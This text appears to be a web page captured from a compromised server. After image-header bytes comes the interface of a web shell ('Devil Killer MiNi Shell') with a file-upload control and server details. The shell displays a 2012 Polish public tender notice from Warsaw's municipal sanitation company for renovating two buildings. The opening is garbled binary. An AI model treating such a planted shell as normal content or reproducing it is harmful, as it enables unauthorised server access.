JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/212088-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie robót budowlanych polegających na realizacji zadania pn. Remont i modernizacja dwóch budynków warsztatowego oraz socjalno-biurowego położonych w Warszawie przy ul. Tatarskiej 2</b><br>
<b>Numer ogłoszenia: 212088 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania w m.st. Warszawie Sp. z o.o. , ul. Obozowa 43, 01-161 Warszawa, woj. mazowieckie, tel. 022 8882040 do 41, 6320051, faks 022 8882048 lub 49, 8364916.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Usługi komunalne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych polegających na realizacji zadania pn. Remont i modernizacja dwóch budynków warsztatowego oraz socjalno-biurowego położonych w Warszawie przy ul. Tatarskiej 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na realizacji zadania pn. Remont i modernizacja dwóch budynków warsztatowego oraz socjalno-biurowego położonych w Warszawie przy ul. Tatarskiej 2.
Budynek warsztatowy z częścią socjalno-biurową:
1. Parametry budynku:
Część warsztatowa - parter+antresola - (pow. użytkowa/kubatura)
 - część A - 818 m2/ 4810 m3; część B - 741 m2/5450 m3;
Część socjalno-biurowa piwnica+parter+I piętro - (pow. użytkowa/kubatura) 
 - część C 403 m2/1760 m3.
2. Zakres prac budowlanych:
- posadzki (cz. A i B) - skucie wierzchniej warstwy, wykonanie podłoża pod żywicę, wykonanie posadzki z żywicy;
- wykonanie stóp fundamentowych dla urządzeń warsztatowych (maszyny, podnośniki);
- wykonanie wanny żelbetowej dla komory lakierniczej;
- naprawa i wykonanie (w miejscach nowych ścian) tynków wewnętrznych;
- malowanie tynków wewnętrznych;
- wymiana stolarki okiennej i drzwiowej;
- glazura i terrakota w sanitariatach i łazienkach;
- posadzki (cz. C) - gres, wykładzina plastikowa;
- wykonanie elementów ślusarskich (schody, barierki);
- wymiana bram garażowych na segmentowe podnoszone;
- rozbiórka starego i wykonanie nowego pokrycia dachowego wraz z dociepleniem i powłoką z dyspersji asfaltowo-gumowej, orynnowanie; 
- wymiana naświetli dachowych;
- naprawa i docieplenie ścian zewnętrznych i fundamentowych.
3. Zakres prac instalacyjno-montażowych:
- wykonanie instalacji elektrycznej (światło, gniazda, siła, maszyny, urządzenia);
- wykonanie instalacji niskoprądowej (komputery, alarm, monitoring);
- wykonanie instalacji odgromowej;
- wykonanie instalacji wentylacji (stanowiskowej, ogólnej, odciągi spalin);
- wykonanie instalacji kanalizacji odwodnieniowej ACO;
- montaż kurtyn powietrznych. 
Zamawiający we własnym zakresie wykona instalacje c.o. i  wod-kan.
Roboty będą wykonywane na podstawie dokumentacji projektowej, którą otrzymają Wykonawcy zaproszeni do składania ofert.

Budynek socjalno-biurowy:
1. Parametry budynku (parterowy, niepodpiwniczony):
Powierzchnia zabudowy - 694 m2; 
Powierzchnia użytkowa - 543 m2; 
Kubatura  -  2682 m3.
2. Zakres prac budowlanych:
- częściowe demontaże istniejących ścian wewnętrznych, kominów, drzwi, posadzek, okładzin;
- demontaż istniejącego dachu drewnianego o pokryciu papowym;
- wyrównanie wysokości ścian zewnętrznych, zakończenie ścian nowym żelbetowym wieńcem, wyrównanie wysokości ścian wewnętrznych do nowego poziomu;
- wykonanie nowego stropodachu o konstrukcji z wiązarów deskowych oraz pokrycie płytami drewnianymi, papą i powłoką z dyspersji asfaltowo-gumowej, orynnowanie;
- wykonanie nowego sufitu wraz z ociepleniem; 
- wymurowanie ścian wewnętrznych wg nowej aranżacji;
- wyrównanie (podniesienie) poziomów podłóg i wykonanie nowych posadzek (gres, wykładzina plastikowa);
- naprawa i wykonanie (w miejscach nowych ścian) tynków wewnętrznych;
- malowanie tynków wewnętrznych;
- wymiana stolarki okiennej i drzwiowej;
- glazura i terrakota w sanitariatach i łazienkach;
- naprawa i docieplenie ścian zewnętrznych i fundamentowych.
3. Zakres prac instalacyjno-montażowych:
- wykonanie instalacji elektrycznej (światło, gniazda);
- wykonanie instalacji niskoprądowej (komputery, alarm, monitoring);
- wykonanie instalacji odgromowej;
- wykonanie instalacji wentylacji ogólnej.
Zamawiający we własnym zakresie wykona instalacje c.o. i  wod-kan.
Roboty będą wykonywane na podstawie dokumentacji projektowej, którą otrzymają Wykonawcy zaproszeni do składania ofert.

Wartość zamówienia stanowiąca całkowite szacunkowe wynagrodzenie Wykonawcy zamówienia określona została w złotych (bez podatku od towarów i usług Vat) na kwotę poniżej 20.098.000,00 zł.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.11.11.00-9, 45.11.13.00-1, 45.26.10.00-4, 45.31.00.00-3, 45.33.12.11-8, 45.44.21.00-8, 45.42.11.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 135.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium przed upływem terminu składania ofert w wysokości 100.000,00 zł (słownie: sto tysięcy złotych).
2) Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości skutkuje wykluczeniem Wykonawcy z postępowania.
3) Wadium może być wnoszone w jednej lub kilku następujących formach: 
a) pieniądzu (wyłącznie przelew bankowy),
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że  poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity: Dz.U. z 2000, Nr 109, poz. 1158, z póżn. zm)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca posiadał wiedzę i doświadczenie w realizacji robót budowlanych porównywalnych z przedmiotem zamówienia w zakresie umów wykonanych w ciągu ostatnich pięciu lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Dlatego Zamawiający wymaga, aby Wykonawca wykazał się doświadczeniem zawodowym zapewniającym realizacje zamówienia w postaci min. 3 wykonanych robót budowlanych, polegających na przebudowie i/lub rozbudowie i/lub nadbudowie i/lub remoncie i/lub budowie obiektu, w tym: 
a) przynajmniej jedno zamówienie o wartości minimum 3.000.000,00 zł brutto i o powierzchni użytkowej obiektu nie mniejszej niż 1000 m2, obejmujące swoim zakresem roboty ogólnobudowlane, roboty sanitarne i elektryczne, w obiekcie,
b) przynajmniej jedno zamówienie o wartości minimum 1.000.000,00 zł brutto 
i o powierzchni użytkowej obiektu nie mniejszej niż 1000 m2, obejmujące swoim zakresem roboty ogólnobudowlane, roboty sanitarne i elektryczne w obiekcie użyteczności publicznej,
c) przynajmniej jedno zamówienie o wartości minimum 1.000.000,00 zł brutto i o powierzchni użytkowej obiektu nie mniejszej niż 1000 m2, obejmujące swoim zakresem roboty ogólnobudowlane, roboty sanitarne i elektryczne, w obiekcie.

Pod pojęciem obiektu użyteczności publicznej należy rozumieć budynek użyteczności publicznej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002r., Nr 75, poz. 690).
Pod pojęciem obiektu należy rozumieć również zespół obiektów budowlanych objętych jednym zamówieniem.

Sposób oceny spełnienia warunku: Przyznanie punktów nastąpi na bazie dokumentu (wskazanego w sekcji III.4.1) pozycja 1 niniejszego ogłoszenia) złożonego przez Wykonawcę wraz z Wnioskiem o dopuszczenie do udziału w postępowaniu (Oświadczenie potwierdzające posiadanie wiedzy i doświadczenia zawodowego w zakresie niezbędnym do wykonania zamówienia, którego wzór stanowi załącznik do Wniosku o dopuszczenie do udziału w postępowaniu). Jeżeli Wykonawca wykaże doświadczenie zawodowe w zakresie wymaganego minimum tj. 3 robót budowlanych, o których mowa powyżej w pkt. a) do c) - otrzyma 0 punktów. 
Wykazanie więcej niż 3 wykonanych robót, o których mowa powyżej w pkt. a) do c) - po 2 punkty, za każdą wykazaną robotę. Maksymalnie 20 punktów.

Zamawiający przyzna dodatkowe punkty Wykonawcom, którzy wykażą dodatkowo (ponad wymagane minimum, o którym mowa w warunku udziału w postępowaniu opisanym powyżej) wykonanie roboty budowlanej polegającej na przebudowie i/lub rozbudowie i/lub nadbudowie i/lub remoncie i/lub budowie obiektu o wartości zamówienia co najmniej 1.000.000,00 zł brutto, obejmującej swoim zakresem roboty ogólnobudowlane, roboty sanitarne i elektryczne, w obiekcie - 1 punkt za każdą dodatkowo wykazaną robotę, o której mowa powyżej; maksymalnie: 15 pkt.
Ogółem Wykonawca może uzyskać 35 punktów.

Wykonawca w celu wykazania spełnienia warunku, o którym mowa powyżej może polegać na wiedzy i doświadczeniu innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca dysponował następującym potencjałem kadrowym w postaci osób zdolnych do wykonania zamówienia, tzn. dysponował:
1. minimum jedną osobą - kierownikiem budowy:
a) posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 nr 83 poz. 578 ze zm.),
b) posiadającym co najmniej 4 letnie doświadczenie zawodowe w pełnieniu funkcji Kierownika budowy nad przebudową i/lub rozbudową i/lub nadbudową i/lub remontem i/lub budową obiektu użyteczności publicznej, obejmującą swoim zakresem roboty ogólnobudowlane, roboty sanitarne i elektryczne,
c) pełniącego funkcję Kierownika Budowy nad co najmniej jedną(ym) przebudową i/lub rozbudową i/lub nadbudową i/lub remontem i/lub budową obiektu użyteczności publicznej o wartości inwestycji minimum 3.000.000 PLN brutto i o powierzchni użytkowej nie mniejszej niż 1000 m2;
2. minimum jedna osobą - kierownikiem robót wentylacyjnych:
a) posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci i urządzeń klimatyzacyjnych i wentylacyjnych, zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 nr 83 poz. 578 ze zm.),
b) posiadającym co najmniej 2 letnie doświadczenie zawodowe w pełnieniu funkcji Kierownika budowy nad przebudową i/lub rozbudową i/lub nadbudową i/lub remontem i/lub budową obiektu użyteczności publicznej, obejmującą swoim zakresem roboty sanitarne, 
3. minimum jedną osobą - kierownikiem robót elektrycznych:
a) posiadającym uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności robót instalacyjnych w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, zgodnie z Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 nr 83 poz. 578 ze zm.),
b) posiadającym co najmniej 2 letnie doświadczenie zawodowe w pełnieniu funkcji Kierownika budowy nad przebudową i/lub rozbudową i/lub nadbudową i/lub remontem i/lub budową obiektu użyteczności publicznej, obejmującą swoim zakresem roboty elektryczne.

Pod pojęciem obiektu użyteczności publicznej należy rozumieć budynek użyteczności publicznej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U z 2002r., Nr 75, poz.690).

Wykonawca w celu wykazania spełnienia warunku, o którym mowa powyżej może polegać na potencjale kadrowym innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków.
Sposób oceny spełnienia warunku: spełnia/nie spełnia, na bazie dokumentu (wskazanego w sekcji III.4.1) pozycja 2 niniejszego ogłoszenia) złożonego przez Wykonawcę wraz z Wnioskiem o dopuszczenie do udziału w postępowaniu (Oświadczenie potwierdzające dysponowanie potencjałem kadrowym niezbędnym 
do wykonania zamówienia, którego wzór stanowi załącznik do Wniosku o dopuszczenie do udziału w postępowaniu).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca znajdował się w sytuacji finansowej zapewniającej realizację zamówienia tj. dysponował środkami finansowymi lub linią kredytową w wysokości nie mniejszej niż 700.000,00 zł (słownie: siedemset tysięcy złotych).
Wykonawca w celu wykazania spełnienia warunku, o którym mowa powyżej może polegać na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków.
Sposób oceny spełnienia warunku: spełnia/nie spełnia, na bazie dokumentu (wskazanego w sekcji III.4.1) pozycja 3 niniejszego ogłoszenia) złożonego przez Wykonawcę wraz z Wnioskiem o dopuszczenie do udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Celem ułatwienia Wykonawcom złożenia Wniosku o dopuszczenie do udziału w postępowaniu i oświadczeń wymienionych powyżej Zamawiający przygotował formularze - do pobrania ze strony www.mpo.com.pl. 2. W przypadku, gdy w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wskazanych w sekcji III.4.2) poz. 2-4 niniejszego ogłoszenia Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Aktualność wszystkich w/w dokumentów określona jest analogicznie do dokumentów o podobnej treści wydawanych przez odpowiednie urzędy na terenie RP.
3. Wykonawca musi załączyć do wniosku dokumenty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy. 4. W przypadku, o którym mowa powyżej w sekcji III.4.1) (ostatni akapit) niniejszego ogłoszenia kopie składanych dokumentów dotyczące podmiotów, na które powołuje się Wykonawca mają być potwierdzone za zgodność z oryginałem odpowiednio przez Wykonawcę bądź przez te podmioty. 5. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 6. Wniosek wraz z załącznikami musi być podpisany na każdej stronie przez Wykonawcę i złożony w zamkniętej kopercie z napisem: Wniosek o dopuszczenie do udziału w przetargu ograniczonym na wykonanie robót budowlanych polegających na realizacji zadania pn. Remont i modernizacja dwóch budynków warsztatowego oraz socjalno-biurowego położonych w Warszawie przy ul. Tatarskiej 2.
7. Dodatkowo Wykonawca dołączy do Wniosku o dopuszczenie do udziału w postępowaniu:
a) Pełnomocnictwo do podpisania wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego, jeżeli upoważnienie do jego złożenia nie wynika z przepisów bądź z zapisów właściwego rejestru - KRS.
b) Pisemne zobowiązanie podmiotów, na które Wykonawca się powołuje do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (dla sytuacji, o których mowa w sekcji III.3.2), III.3.4) i III.3.5) niniejszego ogłoszenia).

8. W przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia, listę wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu</p>
<p>1) Punktacja, która będzie służyła do stworzenia rankingu Wykonawców została określona w sekcji III.3) niniejszego ogłoszenia.
